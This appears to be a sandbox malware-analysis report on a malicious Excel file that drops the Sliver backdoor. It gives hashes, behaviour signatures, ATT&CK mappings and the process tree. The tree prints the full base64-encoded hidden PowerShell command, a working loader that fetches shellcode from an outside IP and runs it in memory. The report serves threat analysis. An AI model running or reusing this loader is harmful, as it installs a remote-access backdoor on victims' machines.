sliver | 1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b

General

Target

1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls
Size

46KB
MD5

9d4d6a868e20ae3090b0a97ebe51b5ce
SHA1

a40170979f8e1dff1b0a20001242bd024071fe4c
SHA256

1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b
SHA512

e9aac651935d38486fc6881d877552ed30de12bdbcde9201ae2cd6dbad1eb17b6c49e6c7300522606b3d3cfd2073e80e5a80c19d6360c05e13dcba59b4be29a7
SSDEEP

768:34SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:ISFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1392	4856	powershell.exe	EXCEL.EXE

Sliver RAT v2 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1392-60-0x00000288E99C0000-0x00000288EA43E000-memory.dmp	SliverRAT_v2
behavioral2/memory/1392-62-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp	SliverRAT_v2
behavioral2/memory/1392-63-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp	SliverRAT_v2
behavioral2/memory/1392-61-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp	SliverRAT_v2
behavioral2/memory/1392-64-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp	SliverRAT_v2
behavioral2/memory/1392-74-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 64 IoCs

Processes:

powershell.exe

flow	pid	process
23	1392	powershell.exe
24	1392	powershell.exe
31	1392	powershell.exe
32	1392	powershell.exe
33	1392	powershell.exe
34	1392	powershell.exe
43	1392	powershell.exe
44	1392	powershell.exe
45	1392	powershell.exe
46	1392	powershell.exe
47	1392	powershell.exe
48	1392	powershell.exe
49	1392	powershell.exe
50	1392	powershell.exe
56	1392	powershell.exe
61	1392	powershell.exe
66	1392	powershell.exe
67	1392	powershell.exe
68	1392	powershell.exe
69	1392	powershell.exe
70	1392	powershell.exe
71	1392	powershell.exe
72	1392	powershell.exe
73	1392	powershell.exe
74	1392	powershell.exe
75	1392	powershell.exe
76	1392	powershell.exe
81	1392	powershell.exe
82	1392	powershell.exe
85	1392	powershell.exe
87	1392	powershell.exe
88	1392	powershell.exe
89	1392	powershell.exe
90	1392	powershell.exe
91	1392	powershell.exe
92	1392	powershell.exe
93	1392	powershell.exe
94	1392	powershell.exe
95	1392	powershell.exe
97	1392	powershell.exe
98	1392	powershell.exe
99	1392	powershell.exe
100	1392	powershell.exe
101	1392	powershell.exe
102	1392	powershell.exe
103	1392	powershell.exe
104	1392	powershell.exe
105	1392	powershell.exe
106	1392	powershell.exe
107	1392	powershell.exe
108	1392	powershell.exe
109	1392	powershell.exe
110	1392	powershell.exe
111	1392	powershell.exe
112	1392	powershell.exe
113	1392	powershell.exe
114	1392	powershell.exe
115	1392	powershell.exe
116	1392	powershell.exe
117	1392	powershell.exe
118	1392	powershell.exe
119	1392	powershell.exe
120	1392	powershell.exe
121	1392	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1392 powershell.exe

pid	process
1392	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4856 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1392 powershell.exe
1392 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1392 powershell.exe

pid	process
1392	powershell.exe
1392	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1392	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

EXCEL.EXEpowershell.execsc.exe

description	pid	process	target process
PID 4856 wrote to memory of 1392	4856	EXCEL.EXE	powershell.exe
PID 4856 wrote to memory of 1392	4856	EXCEL.EXE	powershell.exe
PID 1392 wrote to memory of 4872	1392	powershell.exe	csc.exe
PID 1392 wrote to memory of 4872	1392	powershell.exe	csc.exe
PID 4872 wrote to memory of 1676	4872	csc.exe	cvtres.exe
PID 4872 wrote to memory of 1676	4872	csc.exe	cvtres.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1392
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gpu5lrdn\gpu5lrdn.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4872
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6590.tmp" "c:\Users\Admin\AppData\Local\Temp\gpu5lrdn\CSCC14A741FB0A34AB68F6F7ABD8FE589A5.TMP"
      4⤵
      PID:1676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES6590.tmp

Filesize
1KB

MD5
494d1acd6abfafc66792f5e620650eb8

SHA1
f8785660b072b91514ba5125428edbd3f48541d2

SHA256
3f608c492f0a35791c6a56c157144693e0e06586451f43d4b136c81b172186ca

SHA512
b7ef326967a99c0d9e9f8d95c038898b4040cf8e4db70b6161dff5d6f7b0265e7ded74571f03391c513855c16c071e92f4d1973e445c87dc638c028eaa9412de

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5y1uafs.5jd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gpu5lrdn\gpu5lrdn.dll

Filesize
3KB

MD5
d284f184b933aea97028ef51bd305328

SHA1
49b50195c2e37b14e3972ee20d433922ba157800

SHA256
9ddcc6106dcb6032320965c3d2052df9842bec909f9ccba4bbc0931bdeff7acd

SHA512
17d5d007983e2c56c874b0f934863569ea6af6c9847a94225a84895330c4263c899465e2bdfdfe929fbbed781883a565f95a88490fdd521b0d0d7149433a5ebb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gpu5lrdn\CSCC14A741FB0A34AB68F6F7ABD8FE589A5.TMP

Filesize
652B

MD5
3338efe0078703733de2f1499416617f

SHA1
7ec04e088fd0212f5b19d0d7408023f519e9317a

SHA256
73ccae6e368e3dd2b2bb15bafd744b50788a788aff2feb9367895a030e9358c8

SHA512
0af44bfb396af3ffa0eaa96c0cbf0cd7bdaca38c9a693f98399fb8b1a20192a96a2717eacf89c6e4dea88b99a2ae586d22f3d4a0424a070844cf023cf790c29e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gpu5lrdn\gpu5lrdn.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gpu5lrdn\gpu5lrdn.cmdline

Filesize
369B

MD5
bf7a23ae380a2989227f1cd81551a9df

SHA1
58b035db61fc9332cc418366ea92be6e449b18a8

SHA256
c804df039626b6a55072c7e5d696465beb5a9a7c9450f864e1921c984598800e

SHA512
c73f822a2c78a870191f34ccab869423e98e8b65bb74645728a083aa217930d8a30c46261203225e222c871fdb76789c27ecfcf81d8fd4f42f2312b9f22b7cdb

Download Submit
memory/1392-61-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp

Filesize
10.9MB

Download
memory/1392-56-0x00000288E91D0000-0x00000288E91D8000-memory.dmp

Filesize
32KB

Download
memory/1392-60-0x00000288E99C0000-0x00000288EA43E000-memory.dmp

Filesize
10.5MB

Download
memory/1392-62-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp

Filesize
10.9MB

Download
memory/1392-63-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp

Filesize
10.9MB

Download
memory/1392-31-0x00000288E8F80000-0x00000288E8FA2000-memory.dmp

Filesize
136KB

Download
memory/1392-64-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp

Filesize
10.9MB

Download
memory/1392-74-0x00000288EAEC0000-0x00000288EB9A6000-memory.dmp

Filesize
10.9MB

Download
memory/4856-12-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-14-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-7-0x00007FFACC9F0000-0x00007FFACCA00000-memory.dmp

Filesize
64KB

Download
memory/4856-20-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-21-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-9-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-16-0x00007FFACA700000-0x00007FFACA710000-memory.dmp

Filesize
64KB

Download
memory/4856-10-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-13-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-15-0x00007FFACA700000-0x00007FFACA710000-memory.dmp

Filesize
64KB

Download
memory/4856-1-0x00007FFB0CA0D000-0x00007FFB0CA0E000-memory.dmp

Filesize
4KB

Download
memory/4856-8-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-11-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-5-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-6-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-2-0x00007FFACC9F0000-0x00007FFACCA00000-memory.dmp

Filesize
64KB

Download
memory/4856-3-0x00007FFACC9F0000-0x00007FFACCA00000-memory.dmp

Filesize
64KB

Download
memory/4856-4-0x00007FFACC9F0000-0x00007FFACCA00000-memory.dmp

Filesize
64KB

Download
memory/4856-65-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-66-0x00007FFB0CA0D000-0x00007FFB0CA0E000-memory.dmp

Filesize
4KB

Download
memory/4856-67-0x00007FFB0C970000-0x00007FFB0CB65000-memory.dmp

Filesize
2.0MB

Download
memory/4856-0-0x00007FFACC9F0000-0x00007FFACCA00000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads